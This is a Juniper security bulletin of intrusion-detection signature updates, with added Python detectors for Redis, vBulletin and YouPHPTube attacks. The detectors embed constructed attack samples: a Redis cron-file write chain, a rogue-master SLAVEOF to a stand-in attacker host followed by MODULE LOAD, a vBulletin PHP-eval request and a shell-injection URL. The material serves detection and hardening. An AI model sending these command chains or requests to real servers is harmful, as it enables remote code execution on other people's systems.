Juniper Networks

Update Details

Security Intelligence Center

Update #3243 (01/14/2020)

4 new signatures:

MEDIUM   HTTP:CTS:MCAFEE-DATA-LOSS-ID - HTTP: McAfee Data Loss Prevention Information Disclosure
HIGH     APP:REDIS-UNAUTH-RCE - HTTP: Redis Unauthenticated Remote Code Execution
MEDIUM   HTTP:MAL-REDIRECT-VUL-91 - HTTP: MAL-REDIRECT Infection-91
HIGH     HTTP:CTS:YOUPHPTUBE-ENCODER-CE - HTTP: YouPHPTube Encoder getImageMP4 Command Injection

4 updated signatures:

HIGH     HTTP:STC:ACTIVEX:MSCOMCTL-OCX - HTTP: Microsoft Windows Common Control 'MSCOMCTL.OCX' Unsafe ActiveX Control
HIGH     HTTP:PHP:VBULLETIN-RCE - HTTP: vBulletin Pre-Auth Remote Code Execution
HIGH     HTTP:MISC:ANT-MAN-AUTH-BY - HTTP: antMan 0.9.1a CVE-2018-7739 Authentication Bypass
MEDIUM   HTTP:SCRIPT-INJ-VUL-90 - HTTP: SCRIPT-INJ Infection-90


Details of the signatures included within this bulletin:


HTTP:CTS:MCAFEE-DATA-LOSS-ID - HTTP: McAfee Data Loss Prevention Information Disclosure

Severity: MEDIUM

Description:

This signature detects attempts to exploit a known information-disclosure vulnerability in McAfee Data Loss Prevention (see the Exploit-DB reference below). A successful attack discloses sensitive information to the attacker.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, isg-3.0.0, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, idp-5.0.0, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, srx-17.4, idp-5.1.110170603, vsrx-15.1

References:

  • url: https://www.exploit-db.com/exploits/38631

HTTP:MISC:ANT-MAN-AUTH-BY - HTTP: antMan 0.9.1a CVE-2018-7739 Authentication Bypass

Severity: HIGH

Description:

This signature detects attempts to exploit CVE-2018-7739, an authentication bypass in the antMan web management interface of Antsle appliances (the affected-products list below names antMan 0.9.0c). A successful attack lets a remote attacker reach the management interface without valid credentials.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, idp-5.0.0, vsrx-17.4, srx-branch-17.4, srx-17.4, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, isg-3.5.141818, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.0.0, idp-5.1.110170603, vsrx-15.1

References:

  • cve: CVE-2018-7739

Affected Products:

  • Antsle antman 0.9.0c

HTTP:PHP:VBULLETIN-RCE - HTTP: vBulletin Pre-Auth Remote Code Execution

Severity: HIGH

Description:

This signature detects attempts to exploit CVE-2019-16759 in vBulletin 5.x: a request routed to ajax/render/widget_php that carries a widgetConfig[code] parameter has that parameter evaluated as PHP on the server, with no authentication required. A successful attack leads to arbitrary code execution as the web server user.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, idp-5.0.0, vsrx-17.4, srx-branch-17.4, srx-17.4, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, isg-3.5.141818, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.0.0, idp-5.1.110170603, vsrx-15.1

References:

  • cve: CVE-2019-16759

Affected Products:

  • Vbulletin vbulletin 5.2.2
  • Vbulletin vbulletin 5.1.2
  • Vbulletin vbulletin 5.5.2
  • Vbulletin vbulletin 5.5.0
  • Vbulletin vbulletin 5.5.1
  • Vbulletin vbulletin 5.0.3
  • Vbulletin vbulletin 5.5.4
  • Vbulletin vbulletin 5.4.3
  • Vbulletin vbulletin 5.1.1
  • Vbulletin vbulletin 5.2.0
  • Vbulletin vbulletin 5.0.0
  • Vbulletin vbulletin 5.1.0
  • Vbulletin vbulletin 5.0.4
  • Vbulletin vbulletin 5.2.1
  • Vbulletin vbulletin 5.0.1
  • Vbulletin vbulletin 5.5.3
  • Vbulletin vbulletin 5.1.3
  • Vbulletin vbulletin 5.0.5
  • Vbulletin vbulletin 5.2.6
  • Vbulletin vbulletin 5.0.2

HTTP:MAL-REDIRECT-VUL-91 - HTTP: MAL-REDIRECT Infection-91

Severity: MEDIUM

Description:

This signature detects an attempt to download exploits from a malicious exploit kit, reached here through a malicious redirect (MAL-REDIRECT), that may compromise a computer through vulnerabilities in various vendors' software. Exploit kits are a specific type of toolkit used by cybercriminals to deliver other malware.

Supported On:

srx-17.3, vsrx-17.4, srx-17.4, vsrx3bsd-18.2, srx-18.2, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, vsrx-19.2, srx-19.2, vsrx3bsd-19.2, srx-19.4, vsrx3bsd-19.4, vsrx-19.4, vsrx-15.1, srx-12.1


HTTP:STC:ACTIVEX:MSCOMCTL-OCX - HTTP: Microsoft Windows Common Control 'MSCOMCTL.OCX' Unsafe ActiveX Control

Severity: HIGH

Description:

This signature detects attempts to exploit a known flaw (CVE-2012-0158) in the Microsoft Windows Common Controls ActiveX library, MSCOMCTL.OCX. An attacker could exploit the vulnerability by constructing a specially crafted web page or by sending a malicious RTF document that embeds the control. Visiting the web page with a vulnerable version of Internet Explorer, or opening the RTF document with Office or WordPad, could result in arbitrary code execution.

Supported On:

idp-5.1.110161014, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, srx-17.4, idp-5.1.110170603, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, srx-18.2, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, srx-branch-19.1, vsrx-19.2, srx-19.2, srx-branch-19.2, vsrx3bsd-19.2, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, j-series-9.5, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, idp-4.2.110100823, idp-5.0.0, isg-3.5.0, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.1.134269, vsrx-15.1

References:

  • cve: CVE-2012-0158
  • bugtraq: 52911
  • url: http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html

Affected Products:

  • Microsoft sql_server_2000 SP3
  • Microsoft visual_foxpro 9.0 SP1
  • Microsoft visual_foxpro 8.0
  • Microsoft sql_server_2000 SP1
  • Microsoft sql_server_2000 SP4
  • Microsoft office_2003 SP2
  • Microsoft visual_foxpro 8.0 SP1
  • Microsoft office_2007 SP2
  • Microsoft visual_foxpro 9.0 SP2
  • Microsoft office_2010_(32-bit_edition)
  • Microsoft sql_server_2005_x64_edition SP2
  • Microsoft sql_server_2005_itanium_edition SP2
  • Microsoft sql_server_2005_express_edition SP2
  • Microsoft biztalk_server_2002 SP1
  • Microsoft commerce_server_2002 SP3
  • Microsoft commerce_server_2002 SP4
  • Microsoft commerce_server_2007 SP1
  • Microsoft commerce_server_2007 SP2
  • Microsoft commerce_server_2009
  • Microsoft commerce_server_2009 R2
  • Microsoft visual_basic 6.0
  • Microsoft sql_server_2005_itanium_edition
  • Microsoft sql_server_2005_itanium_edition SP4
  • Microsoft sql_server_2005_express_edition SP3
  • Microsoft sql_server_2005_express_edition SP4
  • Microsoft sql_server_2005_itanium_edition SP3
  • Microsoft sql_server_2005_x64_edition SP3
  • Microsoft sql_server_2008_itanium SP1
  • Microsoft sql_server_2008_x64 SP2
  • Microsoft sql_server_2008_32-bit SP2
  • Microsoft sql_server_2008_itanium SP2
  • Microsoft sql_server_2008_itanium R2
  • Microsoft office_2003 SP1
  • Microsoft sql_server_2000 SP2
  • Microsoft sql_server_2005_x64_edition SP4
  • Microsoft sql_server_2008_32-bit R2
  • Microsoft sql_server_2008_32-bit SP3
  • Microsoft sql_server_2008_itanium SP3
  • Microsoft sql_server_2008_x64 SP3
  • Microsoft sql_server_2008 R2 SP1
  • Microsoft sql_server_2005_x64_edition SP1
  • Microsoft office_2007 SP1
  • Microsoft sql_server_2005_itanium_edition SP1
  • Microsoft sql_server_2008
  • Microsoft commerce_server_2002 SP1
  • Microsoft commerce_server_2002 SP2
  • Microsoft sql_server_2005_express_edition SP1
  • Microsoft office_2010 (32-bit edition) SP1
  • Microsoft office_2003_web_components SP3
  • Microsoft office_2003 SP3
  • Microsoft sql_server_2008 R2
  • Microsoft office_2010
  • Microsoft sql_server_2000
  • Microsoft commerce_server_2007
  • Microsoft visual_basic 6.0 Runtime Extended Files

HTTP:SCRIPT-INJ-VUL-90 - HTTP: SCRIPT-INJ Infection-90

Severity: MEDIUM

Description:

This signature detects an attempt to download exploits from a malicious exploit kit, reached here through injected script content (SCRIPT-INJ), that may compromise a computer through vulnerabilities in various vendors' software. Exploit kits are a specific type of toolkit used by cybercriminals to deliver other malware.

Supported On:

srx-17.3, vsrx-17.4, srx-17.4, vsrx3bsd-18.2, srx-18.2, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, vsrx-19.2, srx-19.2, vsrx3bsd-19.2, srx-19.4, vsrx3bsd-19.4, vsrx-19.4, vsrx-15.1, srx-12.1


APP:REDIS-UNAUTH-RCE - HTTP: Redis Unauthenticated Remote Code Execution

Severity: HIGH

Description:

This signature detects attempts to abuse a Redis instance that is reachable over the network without authentication. No software bug is needed: with no password or ACL configured, any client can issue administrative commands such as CONFIG SET, SAVE, SLAVEOF/REPLICAOF and MODULE LOAD, which are enough to write an attacker-controlled file to disk or to load a malicious module (see the referenced post-exploitation talk). A successful attack leads to remote code execution as the Redis service account.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, srx-17.4, idp-5.1.110170603, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, idp-5.0.0, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.0.0, isg-3.1.134269, vsrx-15.1

References:

  • url: https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
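The command chains described above are what a sensor actually has to recognise on the wire. The following Python is an added example for this bulletin, not the signature's own logic or Redis project code: it parses a captured client-to-server Redis stream (RESP arrays as sent by redis-cli, or inline commands typed over nc) and flags the two well-known unauthenticated RCE chains. The three sessions are constructed; 198.51.100.7 is a documentation address standing in for an attacker-controlled host, and the cron and module payloads are placeholders.

```python
"""RESP parser plus a detector for the command sequences behind unauthenticated
Redis RCE. Added example, not the signature's logic. All sessions below are
constructed; 198.51.100.7 is a documentation address for the attacker host."""


def resp_encode(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings (what redis-cli sends)."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(out)


def parse_stream(data: bytes) -> list:
    """Split a client-to-server byte stream into commands (lists of arguments).

    Handles RESP arrays and the inline form typed over nc/telnet; inline
    arguments are whitespace-split, so quoted inline strings are not supported."""
    cmds, i = [], 0
    while i < len(data):
        if data[i:i + 1] == b"*":
            end = data.index(b"\r\n", i)
            count, i = int(data[i + 1:end]), end + 2
            args = []
            for _ in range(count):
                if data[i:i + 1] != b"$":
                    raise ValueError("expected bulk string at offset %d" % i)
                end = data.index(b"\r\n", i)
                length, i = int(data[i + 1:end]), end + 2
                args.append(data[i:i + length].decode("utf-8", "replace"))
                i += length + 2
            cmds.append(args)
        else:
            end = data.find(b"\r\n", i)
            end = len(data) if end == -1 else end
            line = data[i:end].decode("utf-8", "replace").split()
            if line:
                cmds.append(line)
            i = end + 2
    return cmds


def assess(cmds: list) -> dict:
    """Track the primitives an attacker chains and return verdicts for the session."""
    st = {"authenticated": False, "dir": None, "dbfilename": None, "save": False,
          "replicaof": None, "module_load": None, "verdicts": []}
    for cmd in cmds:
        name = cmd[0].upper()
        if name == "AUTH":
            st["authenticated"] = True
        elif name == "CONFIG" and len(cmd) >= 4 and cmd[1].upper() == "SET":
            if cmd[2].lower() in ("dir", "dbfilename"):
                st[cmd[2].lower()] = cmd[3]          # file-write primitive being staged
        elif name in ("SAVE", "BGSAVE"):
            st["save"] = True                         # RDB dump lands at dir/dbfilename
        elif name in ("SLAVEOF", "REPLICAOF") and len(cmd) >= 3 and cmd[1].upper() != "NO":
            st["replicaof"] = (cmd[1], cmd[2])        # a rogue master can push any payload
        elif name == "MODULE" and len(cmd) >= 3 and cmd[1].upper() == "LOAD":
            st["module_load"] = cmd[2]                # native code inside the redis process
    if st["dir"] and st["dbfilename"] and st["save"]:
        st["verdicts"].append("RDB file write to %s/%s" % (st["dir"].rstrip("/"), st["dbfilename"]))
    if st["replicaof"] and st["module_load"]:
        st["verdicts"].append("rogue-master replication from %s:%s then MODULE LOAD %s"
                              % (*st["replicaof"], st["module_load"]))
    if st["verdicts"] and not st["authenticated"]:
        st["verdicts"].append("no AUTH seen: admin commands accepted unauthenticated")
    return st


# Constructed session 1: the classic file-write chain dropping a cron entry.
CRON_SESSION = b"".join([
    resp_encode("CONFIG", "SET", "dir", "/var/spool/cron/"),
    resp_encode("CONFIG", "SET", "dbfilename", "root"),
    resp_encode("SET", "payload", "\n\n* * * * * /bin/sh /tmp/x.sh\n\n"),
    resp_encode("SAVE"),
])
# Constructed session 2 (inline form): replicate from a rogue master, then load the module.
MODULE_SESSION = (b"SLAVEOF 198.51.100.7 6379\r\n"
                  b"CONFIG SET dbfilename exp.so\r\n"
                  b"MODULE LOAD ./exp.so\r\n")
# Constructed session 3: an authenticated application client doing normal work.
BENIGN_SESSION = (resp_encode("AUTH", "s3cret-placeholder")
                  + resp_encode("GET", "session:42") + resp_encode("PING"))

if __name__ == "__main__":
    for label, data in (("cron", CRON_SESSION), ("module", MODULE_SESSION), ("benign", BENIGN_SESSION)):
        print(label, assess(parse_stream(data))["verdicts"])
```

On the server side the same chains are closed off by not exposing the instance at all: keep `bind 127.0.0.1` (or a private interface) and `protected-mode yes` in redis.conf, set `requirepass` or, on Redis 6 and later, ACL users without the `@admin` and `@dangerous` categories, and disable or rename CONFIG, SLAVEOF/REPLICAOF and MODULE with `rename-command` where no legitimate client needs them.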

HTTP:CTS:YOUPHPTUBE-ENCODER-CE - HTTP: YouPHPTube Encoder getImageMP4 Command Injection

Severity: HIGH

Description:

This signature detects attempts to exploit CVE-2019-5128, a command injection in the getImageMP4 functionality of YouPHPTube Encoder 2.3, where a request parameter is passed unsanitized into a shell command. A successful attack leads to arbitrary command execution as the web server user.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, isg-3.0.0, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, idp-5.0.0, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, srx-17.4, idp-5.1.110170603, vsrx-15.1

References:

  • cve: CVE-2019-5128

Affected Products:

  • Youphptube youphptube_encoder 2.3
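Both web-application signatures in this bulletin (HTTP:PHP:VBULLETIN-RCE above and HTTP:CTS:YOUPHPTUBE-ENCODER-CE here) key on a specific path plus a specific parameter. The Python below is an added example, not Juniper's signature logic: it parses raw HTTP requests and reports the two request shapes. All requests are constructed with .test hostnames. The vBulletin names (routestring=ajax/render/widget_php, widgetConfig[code]) come from the public details of CVE-2019-16759; the YouPHPTube Encoder parameter, base64Url to objects/getImageMP4.php, is assumed here from the public advisory for CVE-2019-5128 and should be checked against the installed code before the check is relied on.

```python
"""Inspect raw HTTP requests for the two web-application signatures in this
bulletin. Added example, not Juniper's signature logic; all requests are
constructed. The YouPHPTube parameter name (base64Url) is an assumption taken
from the public advisory for CVE-2019-5128."""
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# Characters that turn a decoded URL into a second shell command.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")


def parse_request(raw: str):
    """Return (method, path, params) for one HTTP/1.x request; POST bodies are
    treated as application/x-www-form-urlencoded."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return method.upper(), parts.path, params


def decode_b64(value: str):
    """Decode as PHP base64_decode would; None if the value is not base64."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect(raw: str) -> list:
    """Return [(cve, evidence), ...] for one request; empty when nothing matches."""
    method, path, params = parse_request(raw)
    findings = []
    # vBulletin 5.x: routing to ajax/render/widget_php with widgetConfig[code]
    # gets that parameter evaluated as PHP, no login required (CVE-2019-16759).
    route = params.get("routestring", [""])[0]
    if (route == "ajax/render/widget_php" or path.endswith("/ajax/render/widget_php")) \
            and "widgetConfig[code]" in params:
        findings.append(("CVE-2019-16759", params["widgetConfig[code]"][0]))
    # YouPHPTube Encoder 2.3: the decoded URL is spliced into a shell command, so
    # shell metacharacters in it are the injection itself (CVE-2019-5128).
    if path.endswith("/objects/getImageMP4.php") and "base64Url" in params:
        decoded = decode_b64(params["base64Url"][0])
        if decoded is not None and SHELL_META.search(decoded):
            findings.append(("CVE-2019-5128", decoded))
    return findings


# Constructed request samples.
VB_ATTACK = (
    "POST / HTTP/1.1\r\nHost: forum.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "routestring=ajax/render/widget_php&widgetConfig%5Bcode%5D=phpinfo%28%29%3B"
)
VB_BENIGN = "GET /forum/general-discussion HTTP/1.1\r\nHost: forum.example.test\r\n\r\n"


def encoder_request(url: str) -> str:
    """Build a getImageMP4.php request the way a legitimate caller would."""
    b64 = quote(base64.b64encode(url.encode()).decode(), safe="")
    return ("GET /objects/getImageMP4.php?base64Url=%s&time=1 HTTP/1.1\r\n"
            "Host: encoder.example.test\r\n\r\n" % b64)


YPT_ATTACK = encoder_request("http://cdn.example.test/a.mp4;id>/tmp/o")
YPT_BENIGN = encoder_request("https://cdn.example.test/clip.mp4")

if __name__ == "__main__":
    for name, req in (("vb-attack", VB_ATTACK), ("vb-benign", VB_BENIGN),
                      ("ypt-attack", YPT_ATTACK), ("ypt-benign", YPT_BENIGN)):
        print(name, inspect(req))
```

The vBulletin check matches on the route rather than only the URL path because the vulnerable handler is reached through the routestring parameter on a POST to the site root, which a path-only rule would miss; the YouPHPTube check decodes the parameter first because the metacharacters are only visible after base64 decoding.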